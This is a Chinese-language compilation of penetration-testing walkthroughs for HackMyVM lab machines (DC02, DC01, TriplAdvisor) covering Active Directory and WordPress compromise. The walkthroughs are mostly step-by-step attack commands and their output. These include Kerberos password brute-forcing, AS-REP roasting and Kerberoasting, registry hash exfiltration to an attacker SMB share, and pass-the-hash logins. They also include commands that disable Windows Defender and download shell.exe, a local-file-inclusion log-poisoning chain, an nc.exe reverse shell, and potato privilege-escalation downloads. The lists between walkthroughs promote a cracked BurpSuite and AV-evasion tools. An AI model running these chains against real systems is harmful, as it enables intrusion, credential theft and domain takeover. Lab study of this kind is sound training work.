HackMyVm-DC02 ：中等 中途可能会切换好几次IP，但是都是同一个靶机，我自己网络不稳定，或者机器环境有问题，重装导致的，不用管IP的变化12.1 端口扫描这里使用nmap进行全端口扫描，识别目标开放的服务和操作系统信息nmap -sS -p- -T4 192.168.219.240 -A端口53：DNS服务，用于域名解析 端口88：Kerberos认证，域用户登录验证 端口139/445：SMB文件共享服务 端口389：LDAP目录服务，存储用户信息 端口636：安全的LDAP 端口5985：WinRM远程管理 这些端口组合表明这是一个域控制器！12.2 enum4linux枚举使用enum4linux-ng通过 LDAP/SMB/RPC 等协议枚举目标系统信息（是enum4linux的升级版，现在有社区维护，老版已不再维护）enum4linux-ng -A 192.168.219.240 -C工具作用：通过 SMB/LDAP/RPC 等协议自动枚举 Windows 域环境信息12.3 尝试使用匿名登录目的：检查是否允许匿名访问SMB共享 结果：需要认证，匿名访问被拒绝smbclient -L //192.168.219.227/ -N12.4 kerberos 用户名枚举字典使用的是seclist，总共发现了3个用户，admin / zximena448 / charliekerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt --dc 192.168.219.227kerbrute：一款用于Kerberos用户枚举和密码爆破的工具。userenum：用户枚举模式。-d SOUPEDECODE.LOCAL：指定域名。/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt：用户名字典路径。--dc 192.168.219.240：指定域控制器的IP地址。12.5 爆破 kerberos 协议爆破kerberos 协议的时候，需要同步时间（Kerberos要求时间偏差在5分钟内）ntpdate 192.168.219.227 # 将本地时间与目标域控制器同步 kerbrute bruteuser --dc 192.168.219.227 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames-dup.txt charlie -v# 参数解析 bruteuser：针对单个用户进行密码爆破 --dc 192.168.219.240：域控制器IP -d SOUPEDECODE.LOCAL：域名 /usr/share/...usernames-dup.txt：密码字典（这里误用了用户名字典，应该用密码字典） charlie：目标用户名 -v：详细输出模式如果不同步时间就会出现如下结果为什么需要同步时间？Kerberos 认证流程中，客户端向 KDC（域控制器）请求票据（如 AS-REQ）时，会在请求中包含当前时间戳，KDC 收到请求后会：检查客户端时间戳与自身系统时间的偏差是否在允许范围内（默认通常为 5 分钟，由域策略 Maximum tolerance for computer clock synchronization 控制）。若偏差超过阈值，KDC 会直接拒绝请求，返回错误 KDC_ERR_CLOCK_SKEW_TOO_GREAT（时钟偏差过大）。有了账号密码charlie/charlie，登录smb服务使用evil-winrm远程连接服务器（类似于3389端口的rdp远程连接），这个服务运行在5985端口evil-winrm -i 192.168.219.227 -u charlie -p charlie12.6 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果impacket-GetUserSPNs -request -dc-ip 192.168.219.227 SOUPEDECODE.LOCAL/charlie:charlie12.7 枚举域内用户SID再由于目标域不支持匿名登录（包括smb）所以不能使用-no-pass参数来枚举这个域的SID核心作用是通过 SMB/LDAP 协议查询目标系统的SID SMB/LDAP 及其账号和组信息python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 -no-passSID遍历，枚举域内用户，使用账号密码charlie:charlie（看看charlie这个用户有没有权限查看SID）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240正常枚举域内用户信息，把它归纳成一个字典python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/charlie@192.168.219.240 > user # 将枚举出来的用户都筛选出来，去掉多余字符 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt12.8 获取不需要预认证用户的AS-REP哈希正常情况下，银行（KDC）会强制要求你提供 “加密时间戳”（预认证）才给你凭证 —— 但如果某个用户的 “银行卡设置” 里，把 “必须要预认证” 这个选项关了（域用户未启用 Kerberos 预认证），会发生什么？→ 你不用提供 “加密时间戳”，只要报出 “身份证号”（用户名），银行就直接把 “加密的取钱凭证”（AS-REP 票据）给你了！→ 拿到这张凭证（AS-REP 哈希）后，你就可以拿回家 “慢慢试密码”（用 hashcat/john 爆破）—— 反正凭证是加密的，试错不会被银行发现（不会触发账号锁定）。这就是为什么要找 “不需要预认证的用户”：能无风险、无凭证地拿到他的 AS-REP 哈希，进而破解出明文密码。impacket-GetNPUsers -dc-ip 192.168.219.240 soupedecode.local/ -usersfile target_users.txt > hash12.9 AS-REP哈希爆破使用hashcat爆破不需要预认证的AS-REP哈希结果hashcat -a 0 -m 18200 res.txt /usr/share/wordlists/rockyou.txt提示，设备 #1：此次攻击所需的可分配设备内存不足，切换爆破工具john得到密码internet，那么配合前面的账号密码就是zximena448 ：internet ，再次远程连接evil-winrm -i 192.168.219.240 -u zximena448 -p internet使用smbclient连接smb服务，查看有什么东西smbclient -L //192.168.219.240/ -U zximena448使用这个用户连接C$这个smb共享文件夹再连接ADMIN$这个共享文件夹，也能连接（不过没有发现什么可用的文件）在C$共享文件夹中找到flag用 zximena448 账号查询域内用户信息，获取高权限账号（如 Administrator）的线索。12.10 收集 LDAP 信息目的：获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。必要性：没有域内用户信息，后续攻击会盲目尝试，效率极低。前提：拥有至少一个有效的域内用户凭证（如 zximena448:internet），且域控的 LDAP 端口（389）开放。原理：域内普通用户默认有权限查询 LDAP 目录的基础信息。命令如下ldapsearch -x -H ldap://192.168.219.240 -D "zximena448@SOUPEDECODE.LOCAL" -w 'internet' -b 'DC=SOUPEDECODE,DC=LOCAL' "sAMAccountName=zximena448" memberOf > ldap_result.txt -x 使用简单认证（非 SASL 认证），适合用用户名 / 密码登录。 -H ldap://192.168.215.25 指定 LDAP 服务器地址（这里是域控的 IP）。 -D "zximena448@SOUPEDECODE.LOCAL" 绑定的用户 DN（用户名），即使用 zximena448 的凭证登录 LDAP。 -w 'jesuschrist' 绑定用户的密码（zximena448 的密码）。 -b 'DC=SOUPEDECODE,DC=LOCAL' 查询的基准 DN（域的根目录），即从整个域范围查询。 "sAMAccountName=zximena448" 过滤条件：只查询 sAMAccountName 为 zximena448 的用户（精准定位自身）。 memberOf 只返回该用户的 memberOf 字段（即所属的组）。 > ldap_result.txt 将结果输出到文件，方便查看。 发现zximena448 属于 Backup Operators 组，Backup Operators 是 Windows 域内置的特权组，默认被赋予了 “备份 / 恢复域控系统数据” 的核心权限，而 “备份数据” 的权限恰好覆盖了域控的敏感文件（如存储账号哈希的 NTDS.dit、注册表 SAM/SYSTEM 等）。攻击方式：在 Kali 上启动 SMB 服务，用于接收从目标机器导出的敏感文件（如注册表备份）。impacket-smbserver -smb2support "share" .前提：Kali 的 SMB 端口（445）未被占用，且目标域控能访问 Kali 的 IP（网络连通性）。原理：通过 SMB 协议实现文件共享，方便接收从目标导出的备份文件。12.11 导出注册表备份文件通过 impacket-reg 从域控（192.168.219.240）导出 SYSTEM/SAM/SECURITY 注册表文件（含加密的凭证信息）。impacket-reg "soupedecode.local"/"zximena448":"internet"@"192.168.219.240" backup -o '\\192.168.219.37\share'前提：拥有的域用户（zximena448）需具备读取域控注册表的权限（普通用户可能无此权限，此处可能因目标配置宽松成功）。原理：通过远程注册表服务导出系统关键注册表文件。此时smb服务的回显，备份文件，从域控服务器中传过来成功搭建 SMB 共享 + 导出注册表备份目的：SYSTEM/SAM/SECURITY 注册表文件存储了系统加密的凭证（用户哈希、机器账户哈希等），导出后可离线解密。必要性：直接在域控上提取哈希可能触发告警，通过备份文件离线处理更隐蔽。就能看到开启smb共享文件夹的路径下面多了几个文件12.12 用 secretsdump.py 解密备份文件提取本地管理员哈希和机器账户（DC01$）哈希。目的：从备份文件中提取可直接用于攻击的哈希值（如 DC01$ 机器账户哈希、本地管理员哈希）。必要性：原始注册表文件是加密的，必须用 secretsdump 结合 bootKey 解密才能得到可用的哈希。python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local前提：获取 SYSTEM/SAM/SECURITY 备份文件（本地解密），或拥有目标机器的管理员权限 / 机器账户哈希（远程导出）。原理：利用 Windows 的加密机制，通过 bootKey 解密哈希存储区。┌──(root㉿kali)-[/data/demo] └─# python /usr/share/doc/python3-impacket/examples/secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:45820dc9be5c067950d71e306d3d14084a9a8a3f8e99d7c1f6074080bec85f7c2645011e654397553bc7cad19277e361caaee722709bdaf3bbcbd9f2d0c73b8cf27651387c664ede1f3f7d6845f7d14293fdbcda34eb89d5c665de89860a23833a531ee43e6841b586896e6dbef6ac4e16196af3c6e2070ca148d032697b02bca95820d079296377ba4df3c4201dd419d89b9357bf470139b53d31761452e0f94ae9273a16c3d43ae2404740b5ac085992a092187c1fc6a59d5edb24e8cd8aae2575639cadc4cc18c7c5e5e07f5bf06a6154bb92a1dbcbf00f5b6b3171cd5df73121e0afca158f50df3f3db64c9dad11 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:4408da87fddde5ecdffe27d1d8255bc1 [*] DPAPI_SYSTEM dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4 dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503 [*] NL$KM 0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../... 0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!. 0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c. 0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n... NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991 [*] Cleaning up...12.13 哈希传递攻击（PTH）目的：无需明文密码，直接用哈希值认证并横向移动到域控（DC01$ 是域控的机器账户，默认有高权限）。必要性：多数情况下无法获取明文密码，PTH 是域内横向的核心手段。前提：目标开启 SMB 服务（445 端口），且未禁用 NTLM 认证（默认启用）。原理：通过 NTLM 协议，用哈希替代明文密码完成认证。用 nxc 验证 DC01$ 哈希的有效性，确认可横向到域控。nxc smb 192.168.219.240 -u target_users.txt -H 4408da87fddde5ecdffe27d1d8255bc1用 DC01$ 哈希通过 secretsdump.py 导出域内所有用户哈希（包括 Administrator）。通过 DC01$ 权限导出域内所有用户哈希（包括 Administrator），最终用管理员权限登录域控，实现对整个域的控制。python /usr/share/doc/python3-impacket/examples/secretsdump.py soupedecode.local/'DC01$'@192.168.219.240 -hashes :4408da87fddde5ecdffe27d1d8255bc112.14 完成渗透用 Administrator 哈希通过 evil-winrm 登录域控，完成渗透。前提：域控开启 WinRM 服务（5985/5986 端口），且拥有管理员级别的哈希或明文密码。原理：通过 WinRM 协议远程执行命令，类似 SSH 但针对 Windows。evil-winrm -i 192.168.219.240 -u Administrator -H 8982babd4da89d33210779a6c5b078bd12.15 总结从用户枚举到密码爆破获取初始凭证，通过AS-REP Roasting获取更高权限账户，利用注册表备份提取机器账户哈希，最终通过哈希传递攻击实现域控完全控制。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC01 ：简单 10.1 信息打点nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'漏洞扫描nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln使用新版enum4linux枚举系统的全部信息enum4linux-ng -A 192.168.53.26 -C10.2 SMB无密登录列出来smb共享文件夹可以匿名登录的共享目录中都没有文件，只能继续信息收集从上面enum4linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域后续 LDAP 查询（如 ldapsearch）要写 -b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）后续登录域账号时可用短域名（如 SOUPEDECODE\admin）或完整域名（如 admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。其中- SOUPEDECODE <1c> - B Domain Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL10.3 ldapsearch那么利用ldapsearch的完整命令就如下ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"上面的代码是什么意思呢？其核心”匿名访问被拒绝“各个参数解释如下连接 192.168.53.26 这台 LDAP 服务器（域控制器）；用 匿名方式 访问（-D '' -w '' 表示空用户名、空密码）；查询 dc=SOUPEDECODE,dc=LOCAL 这个节点（域的核心数据节点，存储用户、组等信息）；只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。为什么报错了？text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”我们想访问的 dc=SOUPEDECODE,dc=LOCAL 节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。如果不加这个-b参数呢，把它去掉，这样就成功了ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"这段 ldapsearch 结果包含了 域控制器（192.168.53.26）的核心架构信息我们之前执行的命令指定 -b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；而之前指定的 dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：域的命名结构（域名、目录节点路径）；域功能级别（操作系统版本版本）；支持的协议和认证机制；域控制器的身份标识标识（主机名、角色）；LDAP 服务的配置限制（如最大连接数、查询超时）。10.4 匿名枚举用户的SID解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsidfind / -name lookupsid* 2>/dev/nulllookupsid.py 是 Impacket 工具集中的 SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的 安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass为什么能列举出来SID？lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的 LsaLookupSids2 接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt10.5 nxc内网渗透nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击所以命令如下nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西换一个USERS，这里面有东西，我们去看看，全部下载下来尝试上传一个文件shell，禁止上传将全部的文件都下载下来recurse ON prompt OFF mget *在ybob317中找到了flag10.6 kerberos攻击服务器上开启了kerberos服务如果目标是 域控制器（DC）（如你之前枚举的 DC01.SOUPEDECODE.LOCAL），则 一定开启了 Kerberos 服务，因为：1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe 进程），否则域功能无法正常工作。impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317通过域用户 ybob317 的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用 hashcat 等工具爆破 TGS 票据哈希）。同步时间ntpdate 192.168.53.26将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt使用smbclient登录smbclient //192.168.53.26/backup -U file_svc Password123!! get backup_extract.txt exit随后使用awk进行筛选awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txtnxc smb 192.168.53.26 -u target_users.txt -H ntml.txt最终账号密码如下FileServer$ ：e41da7e79a4c76dbd9cf79d1cb32555910.7 远程连接evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限10.8 获取system权限后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1" Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck Set-MpPreference -DisableRealtimeMonitoring $true # 关闭杀软 Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe" ./shell.exe # msf生成的马可以看到是能正常上线的扫描出来两个提权漏洞，第二个不能用可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + baibaixiaoyu2024exploit/windows/local/ms16_032_secondary_logon_handle_privesc往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Hackmyvm-TriplAdvisor ：简单 9.1 信息打点nmap -sS 192.168.53.243 -p- -T4发现有一个http的域名解析，需要我们在hosts文件中添加好相关的信息nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A打开windows的hosts文件，添加如下信息C:\Windows\System32\drivers\etc\hostskali攻击机器中也不能忘了（方便渗透测试，windows中添加只是为了访问，当然也可以配置代理到kali）echo "192.168.53.243 tripladvisor" >> /etc/hosts打开信息收集插件，发现这是一个wordpress内容管理系统wpscan进行可能的用户，后台密码爆破wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txtwordpress版本信息已经被扫描出来了再使用详细扫描，发现一个插件wpscan --url http://tripladvisor:8080/wordpress/9.2 漏洞利用漏洞检索searchsploit editor 1.1 wordpress searchsploit -m 44340漏洞信息┌──(root㉿kali)-[/data/demo] └─# cat 44340.txt Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422 ** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. ** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized. Vulnerable code: if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; } https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5 By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. ** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd ** Solution ** No fix available yet. ** Timeline ** 03/01/2018: author contacted through siteeditor.org's contact form; no reply 16/01/2018: issue report filled on the public GitHub page with no technical details 18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail 19/01/2018: report sent; author says he will fix this issue "very soon" 31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply 14/02/2018: WP Plugins team contacted; no reply 06/03/2018: vendor contacted; no reply 07/03/2018: vendor contacted; no reply 15/03/2018: public disclosure ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)存在文件包含漏洞，根据上面的url进行修改http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd因为这是windows系统，不存在/etc/passwd，那么怎么快速判断文件是否存在？字典https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt打开bp这里我们上传不了文件（没有账号密码），所以只能包含日志文件c:/xampp/apache/logs/access.log9.3 反弹shell使用curl写入日志，并包含日志文件，尝试获取命令执行结果，结果能正常执行命令┌──(root㉿kali)-[/usr/share/wordlists] └─# curl -A "" http://tripladvisor:8080/wordpress/ ┌──(root㉿kali)-[/usr/share/wordlists] └─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"根据前面传msf马上去的经验，这里就传个nc吧curl -A "" http://tripladvisor:8080/wordpress/ curl -A "" http://tripladvisor:8080/wordpress/ curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"切换到当前用户的文件夹，可以看到第一个flag将这个shell利用nc传到msf中，进行本地漏扫（试一试，说不定就出来了呢，虽然它只在meterpreter后渗透模块中生效）nc.exe 192.168.53.51 1234 -e cmd9.4 msf内核漏扫msfconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter） # 目标是Windows，接收nc命令反弹的shell： set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致） set LPORT 1234 # 监听端口（与nc反弹端口一致） run -j # 启动监听，保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块，估计这里没效果，目前测试只有meterpreter模块反弹的shell能用 set session 1 # 设置反弹成功的会话id为1，使用 sessions 即可查看所有的会话id9.5 土豆提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe失败.\GodPotato-NET4.exe -cmd "cmd /c whoami" .\GodPotato-NET35.exe -cmd "cmd /c whoami" .\GodPotato-NET2.exe -cmd "cmd /c whoami"9.6 JuicyPotato提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe certutil.exe -urlcache -split -f 